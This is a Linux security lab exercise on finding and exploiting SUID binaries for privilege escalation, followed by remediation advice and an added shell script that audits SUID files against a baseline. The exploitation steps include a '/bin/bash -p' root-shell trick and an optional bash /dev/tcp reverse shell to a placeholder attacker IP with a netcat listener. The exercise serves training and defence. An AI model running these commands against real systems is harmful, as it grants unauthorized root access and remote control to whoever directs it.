Exercise 2: Privilege Escalation Using SUID Files

Jan 24, 2025

Objective: Learn how to identify and exploit SUID (Set User ID) files in Linux to escalate privileges and understand best practices to secure them.


Scenario: You have limited access to a Linux system as a standard user. Your task is to explore the system for SUID files, identify a vulnerable binary, and exploit it to escalate your privileges. Afterward, you will analyze the root cause of the vulnerability and implement security measures to prevent exploitation.


Lab Setup

  1. Environment: A Linux system with various SUID files, including at least one misconfigured or vulnerable binary for exploitation.
  2. Tools Required:
    • Terminal access to the Linux system.
    • Networking tools for reverse shell creation (e.g., netcat, bash).

Lab Steps

Step 1: Identify SUID Files

Log in to the target system with your limited user account.

Search for all SUID files on the system using the following command:

find / -type f -perm -4000 2>/dev/null

This command lists every regular file whose mode includes the SUID bit: -perm -4000 matches the setuid bit (octal 4000) regardless of the other permission bits, and 2>/dev/null hides the "Permission denied" errors from directories your user cannot read.

Example output:

/usr/bin/passwd
/usr/bin/vim.basic
/usr/bin/nmap
/bin/bash

Step 2: Analyze SUID Binaries

  1. Research each SUID binary to determine if it is vulnerable or exploitable.
  2. Common SUID binaries to investigate:
    • /usr/bin/passwd: Used for changing passwords but may be misconfigured.
    • /bin/bash: If present with SUID, it allows spawning a shell with root privileges.
    • /usr/bin/nmap: Certain versions allow executing commands via interactive mode.
  3. Choose a vulnerable binary for exploitation. For example, if /bin/bash has the SUID bit set, proceed as follows.

Step 3: Exploit the SUID Binary

Use the vulnerable binary to escalate privileges. For /bin/bash, run:

/bin/bash -p

Verify your privileges:

whoami

The output should be root (the -p flag tells bash to keep the effective UID instead of dropping it to the real UID).

Step 4: Create a Reverse Shell (Optional)

Prepare a listener on your attack machine:

nc -lvnp 4444

Use the SUID binary to create a reverse shell:

/bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'

Replace <your_ip> with your machine’s IP address.

Verify root access in the reverse shell.

Step 5: Secure SUID Files

Identify unnecessary or vulnerable SUID files:

find / -type f -perm -4000 2>/dev/null

Remove the SUID bit for non-essential files using chmod:

chmod u-s /path/to/file

Limit access to SUID files by restricting permissions and monitoring file changes.


Testing and Verification

Verify successful privilege escalation using:

whoami

id

Document all identified SUID files, exploitation steps, and outcomes.

Test the security fixes by attempting to exploit the files again post-remediation.


Solution

Explanation:

  • SUID files execute with the permissions of their owner (often root) regardless of the user running them. This can lead to privilege escalation if a SUID binary is vulnerable or misconfigured.
  • By leveraging a misconfigured SUID binary, attackers can execute arbitrary commands with elevated privileges.

Prevention:

Regularly audit SUID files:

find / -type f -perm -4000 2>/dev/null

Remove the SUID bit from unnecessary binaries:

chmod u-s /path/to/file

Use file integrity monitoring tools to track changes to SUID files.

Apply the principle of least privilege to limit user access to critical files.
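
As an added example that is not part of the original exercise, the POSIX shell script below implements the check behind the audit and monitoring points above: it records the set of SUID files as a baseline and reports any drift (new SUID binaries, or expected ones that lost the bit). It runs on a constructed scratch tree so it touches no real system binaries; the function names and the one-path-per-line baseline format are assumptions.

```shell
#!/bin/sh
# Added example: SUID baseline audit (not part of the original exercise).
# Records the set of SUID files and reports drift against a saved baseline.

# Print the sorted list of SUID regular files below ROOT (one filesystem).
suid_list() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Compare the current SUID set below ROOT with BASELINE (one path per line).
# Prints "+ path" for SUID files missing from the baseline (new escalation
# surface) and "- path" for baseline entries no longer SUID. Returns 1 on drift.
suid_diff() {
    root="$1"; baseline="$2"
    cur=$(mktemp); base=$(mktemp)
    suid_list "$root" > "$cur"
    sort "$baseline" > "$base"                # comm requires sorted input
    added=$(comm -13 "$base" "$cur")          # only in current scan
    removed=$(comm -23 "$base" "$cur")        # only in baseline
    rm -f "$cur" "$base"
    rc=0
    if [ -n "$added" ];   then printf '%s\n' "$added"   | sed 's/^/+ /'; rc=1; fi
    if [ -n "$removed" ]; then printf '%s\n' "$removed" | sed 's/^/- /'; rc=1; fi
    return $rc
}

# Constructed demo tree (assumed layout, no real system files): one expected
# SUID binary, one SUID binary absent from the baseline, one normal binary.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/bin"
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"   # in baseline
    : > "$d/bin/bash";       chmod 4755 "$d/bin/bash"         # unexpected SUID
    : > "$d/usr/bin/vim";    chmod 0755 "$d/usr/bin/vim"      # no SUID bit
    printf '%s\n' "$d/usr/bin/passwd" > "$d/baseline.txt"
    printf '%s\n' "$d"
}

demo_root=$(make_demo_tree)
if suid_diff "$demo_root" "$demo_root/baseline.txt"; then
    echo "no SUID drift"
else
    echo "SUID drift detected (see lines above); remediate with chmod u-s"
fi
rm -rf "$demo_root"
```

To use it on a real host, save the output of suid_list / as the baseline once the system is in a known-good state and run suid_diff from cron or your file integrity monitoring job.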


Reflection

This exercise demonstrates the risks posed by misconfigured SUID files and provides practical steps for identifying and exploiting them. By completing this lab, you’ve gained a deeper understanding of SUID-based privilege escalation and how to prevent such vulnerabilities in Linux systems.
